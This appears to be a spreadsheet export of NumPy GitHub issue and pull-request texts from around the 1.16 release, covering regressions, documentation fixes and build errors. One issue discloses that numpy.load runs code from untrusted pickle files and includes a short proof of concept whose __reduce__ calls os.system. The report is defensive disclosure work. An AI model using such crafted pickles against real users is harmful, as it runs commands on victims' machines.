I tested this by running `python runtests.py` which succeeded, then copied an old `multiarray` c-extension module to the `build/testenv/&lt;...&gt;/numpy.core` directory`. Running `python runtests.py` again failed (as expected) with the new `ImportError`_x000D_
_x000D_
Edit: no need to change imports</t>
  </si>
  <si>
    <t>BUG: report old multiarray module</t>
  </si>
  <si>
    <t xml:space="preserve">ENH: Changed the sequence of checking for locale existence of a file and importing urllib modules in numpy._datasource.py to prevent the import in case the local file was found_x000D_
_x000D_
See #12536_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Change the order of checking for locale file and import urllib modules</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I'm trying to find which one is performing better:_x000D_
_x000D_
1) maxPQ = np.sum(np.maximum(vector_a, vector_b))_x000D_
    return np.sum(np.minimum(vector_a, vector_b))/maxPQ_x000D_
_x000D_
2) maxPQ = np.sum(np.maximum(vector_a, vector_b))_x000D_
    return np.divide(np.sum(np.minimum(vector_a, vector_b)) ,maxPQ)_x000D_
_x000D_
3) return np.divide(np.sum(np.minimum(vector_a, vector_b)) ,np.sum(np.maximum(vector_a, vector_b)))_x000D_
_x000D_
_x000D_
I did some test and it seems that 1 is the fastest. _x000D_
What do you think?_x000D_
Thanks_x000D_
</t>
  </si>
  <si>
    <t>comparing divide performances</t>
  </si>
  <si>
    <t>['15 - Discussion', '57 - Close?']</t>
  </si>
  <si>
    <t xml:space="preserve">numpy load function with evil data will cause  command execution,if attack share evil data on internet,_x000D_
when user load it , it will cause  command execution._x000D_
### Reproducing code example:_x000D_
_x000D_
_x000D_
```python_x000D_
import numpy_x000D_
from numpy import __version___x000D_
print __version___x000D_
import os_x000D_
import  pickle_x000D_
class Test(object):_x000D_
    def __init__(self):_x000D_
        self.a = 1_x000D_
_x000D_
    def __reduce__(self):_x000D_
        return (os.system,('ls',))_x000D_
tmpdaa = Test()_x000D_
with open("a-file.pickle",'wb') as f:_x000D_
    pickle.dump(tmpdaa,f)_x000D_
numpy.load('a-file.pickle')_x000D_
```_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.14.6_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>numpy load function with evil data will cause  command execution</t>
  </si>
  <si>
    <t>['00 - Bug', '15 - Discussion', 'component: Documentation', 'good first issue']</t>
  </si>
  <si>
    <t xml:space="preserve">In Python 2.7, `numpy.compat.py3k.os_fspath` checks `(str, bytes)`, which excludes `unicode` strings. This commit checks against `basestring`, which is PY2/3 compatible._x000D_
_x000D_
Fixes #12749_x000D_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</si>
  <si>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Check paths are unicode, bytes or path-like</t>
  </si>
  <si>
    <t xml:space="preserve">`np.cos` takes an unreasonable amount of time for an array that differs only slightly from one where it is fast._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
L = 2**26_x000D_
N = L*4_x000D_
x = np.linspace(-L,L,N)_x000D_
np.cos(np.pi*x)_x000D_
```_x000D_
takes 13 seconds._x000D_
```python_x000D_
import numpy as np_x000D_
L = 2**26_x000D_
N = L*4+1 # Here is the tiny difference_x000D_
x = np.linspace(-L,L,N)_x000D_
np.cos(np.pi*x)_x000D_
```_x000D_
takes forever  (I just cancelled it after two hours, it was still running at 100% on one core, memory is not an issue, I have 96GB and it was only using around 4GB)._x000D_
_x000D_
Even if I use `L = 2**27` in the first example, the runtime only doubles to 28 seconds, as expected._x000D_
On the other hand, if I use `L=2**25` in the second example, I do get a result but it takes much longer than `L=2**25` in the first example._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; import sys,numpy; print(numpy.__version__,sys.version)_x000D_
1.14.6 3.6.4 |Anaconda, Inc.| (default, Jan 16 2018, 18:10:19) _x000D_
[GCC 7.2.0]_x000D_
```_x000D_
_x000D_
This is on Ubuntu 18. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>np.cos(X) takes forever (or gets stuck, I'm not sure)</t>
  </si>
  <si>
    <t>We've discovered this in our tests in [nipy/nipype](https://github.com/nipy/nipype) when 1.16 was released ([failing test](https://circleci.com/gh/nipy/nipype/7570)). It's unclear why it wasn't hitting our `--pre` tests, but it wasn't too tough to track down and reproduce._x000D_
_x000D_
It appears to have been introduced in #12157, which dropped an `if isinstance(file, basestring):` and explicitly checks `str` and `bytes`, which will resolve to `str` and `str` in Python 2, not `unicode` and `str`._x000D_
_x000D_
This is probably easily fixable on our end (just call `str()`), but in case you intend to support unicode paths, you should know about this._x000D_
_x000D_
Related: nipy/nipype#2855_x000D_
_x000D_
&lt;!--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from __future__ import unicode_literals_x000D_
import numpy as np_x000D_
np.save('abc.npy', np.array([0, 1, 2])_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
_x000D_
```_x000D_
---------------------------------------------------------------------------_x000D_
TypeError                                 Traceback (most recent call last)_x000D_
&lt;ipython-input-6-109f1bba4449&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.save('abc.npy', np.array([0, 1, 2]))_x000D_
_x000D_
/anaconda3/envs/python27/lib/python2.7/site-packages/numpy/lib/npyio.pyc in save(file, arr, allow_pickle, fix_imports)_x000D_
    512         fid = file_x000D_
    513     else:_x000D_
--&gt; 514         file = os_fspath(file)_x000D_
    515         if not file.endswith('.npy'):_x000D_
    516             file = file + '.npy'_x000D_
_x000D_
/anaconda3/envs/python27/lib/python2.7/site-packages/numpy/compat/py3k.pyc in os_fspath(path)_x000D_
    235             else:_x000D_
    236                 raise TypeError("expected str, bytes or os.PathLike object, "_x000D_
--&gt; 237                                 "not " + path_type.__name__)_x000D_
    238         if isinstance(path_repr, (str, bytes)):_x000D_
    239             return path_repr_x000D_
_x000D_
TypeError: expected str, bytes or os.PathLike object, not unicode_x000D_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```_x000D_
('1.16.0', '2.7.15 |Anaconda, Inc.| (default, Dec 14 2018, 13:10:39) \n[GCC 4.2.1 Compatible Clang 4.0.1 (tags/RELEASE_401/final)]')_x000D_
```</t>
  </si>
  <si>
    <t>numpy.save rejects unicode paths in Python 2.7</t>
  </si>
  <si>
    <t xml:space="preserve">Check for error when calling the `PickleBuffer` constructor in `ndarray.__reduce_ex__`,_x000D_
and fall back on the regular `__reduce__` implementation for arrays which don't_x000D_
support taking a buffer._x000D_
_x000D_
Also fix some reference leaks._x000D_
_x000D_
Fixes gh-12745, gh-12793_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix SystemError when pickling datetime64 array with pickle5</t>
  </si>
  <si>
    <t xml:space="preserve">Official Documentation of python 2.7 mentions that numpy.random.randint(a,b) will return a random integer from N such that a&lt;=N&lt;=b. But I have run the code and I have found that it never returns equal to b. So, what I did was I ran numpy.random.randint(0,1) for 50 milion times and finally printed the sum. _x000D_
_x000D_
I don't know if this a documentation or an implementation issue, but this is an issue which needs to be looked at. Below is the code that I ran._x000D_
_x000D_
The output was 0._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
import numpy as np_x000D_
x = np.random_x000D_
_x000D_
sum = 0_x000D_
count = 0_x000D_
sum += x.randint(0,1)_x000D_
_x000D_
while(count&lt;50000000):_x000D_
    sum += x.randint(0,1)_x000D_
    count += 1_x000D_
_x000D_
print(sum)_x000D_
_x000D_
### Numpy/Python version information: python 2.7_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Problem in the documentation of numpy.random.randint in python 2.7</t>
  </si>
  <si>
    <t>When taking a buffer out of an array fails, `__reduce_ex__` raises SystemError instead of propagating the error:_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np                                                                                                                                    _x000D_
&gt;&gt;&gt; d = np.datetime64('2015-07-04 12:59:59.50', 'ns')                                                                                                     _x000D_
&gt;&gt;&gt; a = np.array([d])                                                                                                                                     _x000D_
&gt;&gt;&gt; memoryview(a)                                                                                                                                         _x000D_
Traceback (most recent call last):_x000D_
  File "&lt;ipython-input-4-dd900d27ccee&gt;", line 1, in &lt;module&gt;_x000D_
    memoryview(a)_x000D_
ValueError: cannot include dtype 'M' in a buffer_x000D_
_x000D_
&gt;&gt;&gt; a.__reduce_ex__(5)                                                                                                                                    _x000D_
Traceback (most recent call last):_x000D_
  File "&lt;ipython-input-5-b4bdda9e83c1&gt;", line 1, in &lt;module&gt;_x000D_
    a.__reduce_ex__(5)_x000D_
SystemError: &lt;built-in function __import__&gt; returned a result with an error set_x000D_
```_x000D_
_x000D_
This is because in the C function `array_reduce_ex`, the result of calling the `PickleBuffer` constructor is not checked for NULL, so the original error is ignored and the interpreter ultimately complains._x000D_
_x000D_
(this is related to but distinct from https://github.com/numpy/numpy/issues/4983#issuecomment-441332940)_x000D_
_x000D_
Note: you need `pickle5` installed to reproduce.</t>
  </si>
  <si>
    <t>ndarray.__reduce_ex__ doesn't check return value of PickleBuffer.__new__</t>
  </si>
  <si>
    <t xml:space="preserve">(link: gh-11230)_x000D_
_x000D_
Fixes gh-11221, and now produces:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; a = np.ones((3, 3, 4, 5, 6))_x000D_
&gt;&gt;&gt; b = np.ones((3, 4, 5))_x000D_
&gt;&gt;&gt; np.einsum('aabcb,abc', a, b)_x000D_
ValueError: dimensions in operand 0 for collapsing index 'b' don't match (4 != 6)_x000D_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</si>
  <si>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crash in error message formatting introduced by gh-11230</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.einsum']</t>
  </si>
  <si>
    <t>The ["NumPy for MATLAB users" guide](https://docs.scipy.org/doc/numpy-1.15.0/user/numpy-for-matlab-users.html) claimed that [`numpy.linalg.eig`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.eig.html) solves generalized eigenvalue problems. This is not true._x000D_
_x000D_
Instead we need [`scipy.linalg.eig`](https://docs.scipy.org/doc/scipy/reference/generated/scipy.linalg.eig.html), the output arguments of which are reversed compared to MATLAB's `eig`. We already had `scipy.linalg` references one line later for QR, LU and other decompositions, so this is a very minor change.</t>
  </si>
  <si>
    <t>DOC: fix generalized eigenproblem reference in "NumPy for MATLAB users"</t>
  </si>
  <si>
    <t>Scikit-learn was successfully testing on pypy3 with numpy 1.15 (https://circleci.com/gh/scikit-learn/scikit-learn/43203) but fails during installation when numpy is imported with version 1.16 (https://circleci.com/gh/scikit-learn/scikit-learn/43335)._x000D_
_x000D_
```_x000D_
Installing collected packages: scikit-learn_x000D_
  Running setup.py develop for scikit-learn_x000D_
    Running command /root/project/pypy-env/bin/pypy3 -c "import setuptools, tokenize;__file__='/root/project/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" develop --no-deps_x000D_
    Partial import of sklearn during the build process._x000D_
    Traceback (most recent call last):_x000D_
      File "&lt;string&gt;", line 1, in &lt;module&gt;_x000D_
      File "/root/project/setup.py", line 243, in &lt;module&gt;_x000D_
        setup_package()_x000D_
      File "/root/project/setup.py", line 216, in setup_package_x000D_
        numpy_status = get_numpy_status()_x000D_
      File "/root/project/setup.py", line 149, in get_numpy_status_x000D_
        import numpy_x000D_
      File "/root/project/pypy-env/site-packages/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
        from . import core_x000D_
      File "/root/project/pypy-env/site-packages/numpy/core/__init__.py", line 16, in &lt;module&gt;_x000D_
        from . import multiarray_x000D_
      File "/root/project/pypy-env/site-packages/numpy/core/multiarray.py", line 44, in &lt;module&gt;_x000D_
        arange.__module__ = 'numpy'_x000D_
    AttributeError: readonly attribute '__module__'_x000D_
```_x000D_
_x000D_
This issue was introduced in 4d24bbda32d133d51940b0691bd9b428d4198eaa</t>
  </si>
  <si>
    <t>pypy3: package import fails in 1.16.0 where it passed in 1.15</t>
  </si>
  <si>
    <t>On 1.16.x:_x000D_
```_x000D_
&gt;&gt;&gt; np.percentile([1, np.nan], 1)_x000D_
/home/larsoner/python/numpy/numpy/lib/function_base.py:3821: RuntimeWarning: Invalid value encountered in percentile_x000D_
  interpolation=interpolation)_x000D_
nan_x000D_
```_x000D_
On `master` no warning is emitted. This is breaking a [warning check in scipy](https://travis-ci.org/scipy/scipy/jobs/479387913#L1378-L1381). Is this change intended? If so, I can change the SciPy test in some suitable way, either by emitting our own warning or by asserting the number of warnings is zero if the numpy version is 1.17 or later.</t>
  </si>
  <si>
    <t>BUG?: np.percentile `nan` invalid-value warning removed in 1.17dev</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I would like to build a fortran source while running `python setup.py install`._x000D_
This is the `setup.py` file:_x000D_
_x000D_
```python_x000D_
import setuptools_x000D_
from numpy.distutils.core import Extension, setup_x000D_
_x000D_
ext = Extension(_x000D_
    name    = "modulo.fortran",_x000D_
    sources = [r"src/fortran.f95"],_x000D_
    extra_compile_args = ["-ffree-form", "-ffree-line-length-256", "-fopenmp", "-Ofast", "-lgomp", "-lpthread"],_x000D_
    extra_f77_compile_args = ["-ffree-form", "-ffree-line-length-256", "-fopenmp", "-Ofast", "-lgomp", "-lpthread"],_x000D_
    extra_f90_compile_args = ["-ffree-form", "-ffree-line-length-256", "-fopenmp", "-Ofast", "-lgomp", "-lpthread"],_x000D_
#    f2py_options = ["-ffree-form", "-ffree-line-length-256", "-fopenmp", "-Ofast", "-lgomp", "-lpthread"],_x000D_
    extra_link_args = ["-lgomp", "-lpthread"],_x000D_
)_x000D_
_x000D_
setup(_x000D_
    name         = "modulo",_x000D_
    version      = "0.0",_x000D_
    description  = "description",_x000D_
    author       = "author",_x000D_
    author_email = "mail",_x000D_
    url          = "repo.com",_x000D_
    packages     = ["modulo"],_x000D_
    ext_modules  = [ext],_x000D_
    python_requires  = "&gt;=3.7.*",_x000D_
    tests_require    = ["numpy", "pandas", "pyNastran &gt;= 1.2.*"],_x000D_
    install_requires = ["numpy", "pandas", "pyNastran &gt;= 1.2.*"], # PyQt5_x000D_
    include_package_data = True,_x000D_
)_x000D_
```_x000D_
_x000D_
If I run:_x000D_
_x000D_
 `python setup.py --verbose install`_x000D_
_x000D_
I can see that the compile options are not passed:_x000D_
_x000D_
```python_x000D_
version_cmd     = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-dumpversion']_x000D_
compiler_f77    = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-g', '-ffixed-form', '-fno-second-underscore', '-O3', '-funroll-loops']_x000D_
compiler_f90    = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-g', '-fno-second-underscore', '-O3', '-funroll-loops']_x000D_
compiler_fix    = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-g', '-ffixed-form', '-fno-second-underscore', '-Wall', '-g', '-fno-second-underscore', '-O3', '-funroll-loops']_x000D_
linker_so       = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-g', '-Wall', '-g', '-shared']_x000D_
archiver        = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-cr']_x000D_
ranlib          = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe']_x000D_
linker_exe      = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-Wall']_x000D_
version         = LooseVersion ('5.3.0')_x000D_
libraries       = ['gfortran']_x000D_
library_dirs    = ['C:\\Miniconda3\\Library\\mingw-w64\\lib\\gcc\\x86_64-w64-mingw32\\5.3.0', 'C:\\Miniconda3\\libs', 'C:\\Miniconda3\\PCbuild\\amd64']_x000D_
object_switch   = '-o '_x000D_
compile_switch  = '-c'_x000D_
include_dirs    = ['C:\\Miniconda3\\include', 'C:\\Miniconda3\\include']_x000D_
```_x000D_
_x000D_
Instead if I build just the fortran file with `f2py`:_x000D_
_x000D_
`f2py -c --verbose -m aaa fortran.f95 --opt="-ffree-form -ffree-line-length-256 -fopenmp -Ofast" -lgomp -lpthread --compiler=mingw32 --fcompiler=gnu95`_x000D_
_x000D_
they are passed:_x000D_
_x000D_
```python_x000D_
version_cmd     = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-dumpversion']_x000D_
compiler_f77    = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-g', '-ffixed-form', '-fno-second-underscore', '-ffree-form', '-ffree-line-length-256', '-fopenmp', '-Ofast']_x000D_
compiler_f90    = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-g', '-fno-second-underscore', '-ffree-form', '-ffree-line-length-256', '-fopenmp', '-Ofast']_x000D_
compiler_fix    = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-g', '-ffixed-form', '-fno-second-underscore', '-Wall', '-g', '-fno-second-underscore', '-ffree-form', '-ffree-line-length-256', '-fopenmp', '-Ofast']_x000D_
linker_so       = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-g', '-Wall', '-g', '-shared']_x000D_
archiver        = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-cr']_x000D_
ranlib          = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe']_x000D_
linker_exe      = ['C:\\Miniconda3\\Library\\mingw-w64\\bin\\gfortran.exe', '-Wall', '-Wall']_x000D_
version         = LooseVersion ('5.3.0')_x000D_
libraries       = ['gfortran']_x000D_
library_dirs    = ['C:\\Miniconda3\\Library\\mingw-w64\\lib\\gcc\\x86_64-w64-mingw32\\5.3.0', 'C:\\Miniconda3\\libs', 'C:\\Miniconda3\\PCbuild\\amd64']_x000D_
object_switch   = '-o '_x000D_
compile_switch  = '-c'_x000D_
include_dirs    = ['C:\\Miniconda3\\include', 'C:\\Miniconda3\\include']_x000D_
```_x000D_
_x000D_
Here [module.zip](https://github.com/numpy/numpy/files/2754767/module.zip), I uploaded the test module that I am trying to build._x000D_
_x000D_
Thanks _x000D_
_x000D_
### Numpy/Python version information:_x000D_
```_x000D_
import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.15.4 3.7.2 (default, Jan  2 2019, 17:07:39) [MSC v.1915 64 bit (AMD64)]_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>numpy.distutils.core.Extension: not passing arguments in setup.py</t>
  </si>
  <si>
    <t>DOC: Update release notes and changelog after 1.16.0 release.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Numpy cross-compilation installation failed --&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
export PYTHONPATH="/home/staging_dir/target/usr/lib/python2.7:/home/staging_dir/target//usr/lib/python2.7/site-packages:/home/compile_dir/target/numpy-1.15.4/ipkg-install/usr/lib/python2.7/site-packages";_x000D_
export PYTHONDONTWRITEBYTECODE=1;_x000D_
export _python_sysroot="/home/out";_x000D_
export _python_prefix="/usr";_x000D_
export _python_exec_prefix="/usr";_x000D_
export PYTHONOPTIMIZE="";  _x000D_
cd /home/compile_dir/target/numpy-1.15.4/; _x000D_
CC="arm-openwrt-linux-muslgnueabi-gcc" _x000D_
CCSHARED="arm-openwrt-linux-muslgnueabi-gcc -fpic" _x000D_
CXX="arm-openwrt-linux-muslgnueabi-g++" _x000D_
LD="arm-openwrt-linux-muslgnueabi-gcc" _x000D_
LDSHARED="arm-openwrt-linux-muslgnueabi-gcc -shared" _x000D_
CFLAGS="-Os -pipe -march=armv7-a -mtune=cortex-a7 -mfpu=neon -fno-caller-saves -Wno-unused-result -mfloat-abi=hard  -Wformat -Werror=format-security -fstack-protector -D_FORTIFY_SOURCE=1 -Wl,-z,now -Wl,-z,relro" _x000D_
CPPFLAGS="-I/home/staging_dir/target/usr/include -I/home/staging_dir/target/include -I/home/gcc/linux-x86/arm/toolchain-sunxi-musl/toolchain/usr/include -I/home/gcc/linux-x86/arm/toolchain-sunxi-musl/toolchain/include -I/home/gcc/linux-x86/arm/toolchain-sunxi-musl/toolchain/include/fortify -I/home/staging_dir/target/usr/include/python2.7" _x000D_
LDFLAGS="-L/home/staging_dir/target/usr/lib -L/home/staging_dir/target/lib -L/home/gcc/linux-x86/arm/toolchain-sunxi-musl/toolchain/usr/lib -L/home/gcc/linux-x86/arm/toolchain-sunxi-musl/toolchain/lib -znow -zrelro -lpython2.7" _x000D_
_PYTHON_HOST_PLATFORM=linux2 _x000D_
__PYVENV_LAUNCHER__="/usr/bin/python2.7" _x000D_
FOPT=arm-openwrt-linux-muslgnueabi-gcc BLAS=None LAPACK=None ATLAS=None   _x000D_
/home/out/host/bin/python2.7  ./setup.py  --verbose build --executable=arm-openwrt-linux-muslgnueabi-gcc ;_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
Traceback (most recent call last):_x000D_
  File "./setup.py", line 403, in &lt;module&gt;_x000D_
    setup_package()_x000D_
  File "./setup.py", line 395, in setup_package_x000D_
    setup(**metadata)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/core.py", line 135, in setup_x000D_
    config = configuration()_x000D_
  File "./setup.py", line 167, in configuration_x000D_
    config.add_subpackage('numpy')_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/misc_util.py", line 1037, in add_subpackage_x000D_
    caller_level = 2)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/misc_util.py", line 1006, in get_subpackage_x000D_
    caller_level = caller_level + 1)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/misc_util.py", line 943, in _get_configuration_from_setup_py_x000D_
    config = setup_module.configuration(*args)_x000D_
  File "numpy/setup.py", line 16, in configuration_x000D_
    config.add_subpackage('linalg')_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/misc_util.py", line 1037, in add_subpackage_x000D_
    caller_level = 2)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/misc_util.py", line 1006, in get_subpackage_x000D_
    caller_level = caller_level + 1)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/misc_util.py", line 943, in _get_configuration_from_setup_py_x000D_
    config = setup_module.configuration(*args)_x000D_
  File "numpy/linalg/setup.py", line 29, in configuration_x000D_
    lapack_info = get_info('lapack_opt', 0)  # and {}_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/system_info.py", line 433, in get_info_x000D_
    return cl().get_info(notfound_action)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/system_info.py", line 625, in get_info_x000D_
    self.calc_info()_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/system_info.py", line 1537, in calc_info_x000D_
    openblas_info = get_info('openblas_lapack')_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/system_info.py", line 433, in get_info_x000D_
    return cl().get_info(notfound_action)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/system_info.py", line 625, in get_info_x000D_
    self.calc_info()_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/system_info.py", line 1776, in calc_info_x000D_
    if not (assume_lapack or self.check_embedded_lapack(info)):_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/system_info.py", line 1842, in check_embedded_lapack_x000D_
    obj = c.compile([src], output_dir=tmpdir)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/ccompiler.py", line 343, in CCompiler_compile_x000D_
    single_compile(o)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/ccompiler.py", line 303, in single_compile_x000D_
    self._compile(obj, src, ext, cc_args, extra_postargs, pp_opts)_x000D_
  File "/home/compile_dir/target/numpy-1.15.4/numpy/distutils/unixccompiler.py", line 61, in UnixCCompiler__compile_x000D_
    raise CompileError(msg)_x000D_
distutils.errors.CompileError: Command "arm-openwrt-linux-muslgnueabi-gcc -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -Os -pipe -march=armv7-a -mtune=cortex-a7 -mfpu=neon -fno-caller-saves -Wno-unused-result -mfloat-abi=hard -Wformat -Werror=format-security -fstack-protector -D_FORTIFY_SOURCE=1 -Wl,-z,now -Wl,-z,relro -I/home/staging_dir/target/usr/include -I/home/staging_dir/target/include -I/home/gcc/linux-x86/arm/toolchain-sunxi-musl/toolchain/usr/include -I/home/gcc/linux-x86/arm/toolchain-sunxi-musl/toolchain/include -I/home/gcc/linux-x86/arm/toolchain-sunxi-musl/toolchain/include/fortify -I/home/staging_dir/target/usr/include/python2.7 -fPIC -c /tmp/tmp3lrqts/source.c -o /tmp/tmp3lrqts/tmp/tmp3lrqts/source.o -MMD -MF /tmp/tmp3lrqts/tmp/tmp3lrqts/source.o.d" failed with exit status 127_x000D_
&lt;!-- If you are reporting a segfault please include a GDB traceback, which you_x000D_
can generate by following_x000D_
https://github.com/numpy/numpy/blob/master/doc/source/dev/development_environment.rst#debugging --&gt;_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
python2.7.15 numpy1.15.4_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>arm source install numpy error</t>
  </si>
  <si>
    <t xml:space="preserve">Closes gh-1316_x000D_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</si>
  <si>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Extend documentation of `ndarray.tolist`</t>
  </si>
  <si>
    <t xml:space="preserve">Closes gh-9922._x000D_
_x000D_
Looks like only `NPY_NAN`, `NPY_INFINITY`, `NPY_PZERO` and `NPY_NZERO` use the `F` and `L` suffixes, and they are documented separately:_x000D_
_x000D_
https://github.com/numpy/numpy/blob/master/doc/source/reference/c-api.coremath.rst#floating-point-classification_x000D_
</t>
  </si>
  <si>
    <t>DOC: clarify the suffix of single/extended precision math constants</t>
  </si>
  <si>
    <t>Fixes #8067 and tweaks the docstrings._x000D_
_x000D_
Is there a way to get refguide_check to run on this?</t>
  </si>
  <si>
    <t>DOC: fix and doctest tutorial</t>
  </si>
  <si>
    <t>Float is deprecated for `num` of `linspace`, this warning is printed [during benchmarks](https://travis-ci.org/numpy/numpy/jobs/478915486#L4467)</t>
  </si>
  <si>
    <t>BENCH: quiet DeprecationWarning</t>
  </si>
  <si>
    <t>Previously the significand was shifted right to align denormals of_x000D_
different magnitude. This loses some bits that can make a difference_x000D_
for rounding. This is fixed:_x000D_
 1. For floats, by inspecting the original last bits when this may_x000D_
    make a difference (should happen rarely)_x000D_
 2. For doubles by shifting the bits left to align the denromals and_x000D_
    thus not lose the lowest orginal bits._x000D_
_x000D_
-----_x000D_
_x000D_
I am not sure if the double branch is not being a bit too smart and it is nicer to just also use the `||` logic from above, since it uses different constants compared to the normal branch because of this._x000D_
_x000D_
I do not know if there may be nicer ways with larger code changes, but I could not think of one._x000D_
_x000D_
This closes gh-12721</t>
  </si>
  <si>
    <t>BUG: Fix rounding of denormals in double and float to half casts  …</t>
  </si>
  <si>
    <t>BUG: polyval returned non-masked arrays for masked input.</t>
  </si>
  <si>
    <t>[skip CI]_x000D_
_x000D_
Title says it all. The work is done, matmul is merged.</t>
  </si>
  <si>
    <t>NEP: change NEP20 (ufunc signatures) to 'Final'</t>
  </si>
  <si>
    <t>Fixes #12712._x000D_
_x000D_
Test and fix the regex for a flexible signature for use in `np.vectorize`. Also refactors the test to use `pytest.mark.paramtrize`_x000D_
_x000D_
Still a WIP since there is no end-to-end test that the flexible signatures actually work in `np.vectorize`, I am not sure which test to extend to check this.</t>
  </si>
  <si>
    <t>WIP, ENH: extend np.vectorize for flexible NEP20 signatures</t>
  </si>
  <si>
    <t>As a result of #11490 (ediff1d handles data type errors badly), ediff1d grew some input checks._x000D_
_x000D_
These checks are probably a good thing overall, but are also a functional change where code that works OK now gives a `TypeError` and that causes regressions ([pbcore](https://github.com/PacificBiosciences/pbcore) being the one that I'm looking at right now). _x000D_
_x000D_
Using a variant of ediff1d's own documentation to illustrate:_x000D_
_x000D_
With numpy 1.12.1:_x000D_
_x000D_
    In [1]: import numpy as np_x000D_
    In [2]: x = np.array([1, 2, 4, 7, 0], dtype=np.int32)_x000D_
    In [3]: np.ediff1d(x, to_begin=-99, to_end=np.array([88, 99]))_x000D_
    Out[3]: array([-99,   1,   2,   3,  -7,  88,  99], dtype=int32)_x000D_
_x000D_
And with numpy 1.16.0rc2:_x000D_
_x000D_
    In [1]: import numpy as np_x000D_
    In [2]: x = np.array([1, 2, 4, 7, 0], dtype=np.int32)_x000D_
    In [3]: np.ediff1d(x, to_begin=-99, to_end=np.array([88, 99]))_x000D_
    ---------------------------------------------------------------------------_x000D_
    TypeError                                 Traceback (most recent call last)_x000D_
    &lt;ipython-input-3-29beedef979f&gt; in &lt;module&gt;()_x000D_
    ----&gt; 1 np.ediff1d(x, to_begin=-99, to_end=np.array([88, 99]))_x000D_
    /usr/lib/python3/dist-packages/numpy/lib/arraysetops.py in ediff1d(ary, to_end, to_begin)_x000D_
        120         to_end = np.asanyarray(to_end)_x000D_
        121         if not np.can_cast(to_end, dtype_req):_x000D_
    --&gt; 122             raise TypeError("dtype of to_end must be compatible "_x000D_
        123                             "with input ary")_x000D_
        124 _x000D_
    TypeError: dtype of to_end must be compatible with input ary_x000D_
_x000D_
    In [4]: np.ediff1d(x, to_begin=-99, to_end=np.array([88, 99], dtype=np.int32))_x000D_
    Out[4]: array([-99,   1,   2,   3,  -7,  88,  99], dtype=int32)_x000D_
_x000D_
Quirkily, the way `can_cast` checks values for array scalars but not for arrays, also results in the following:_x000D_
_x000D_
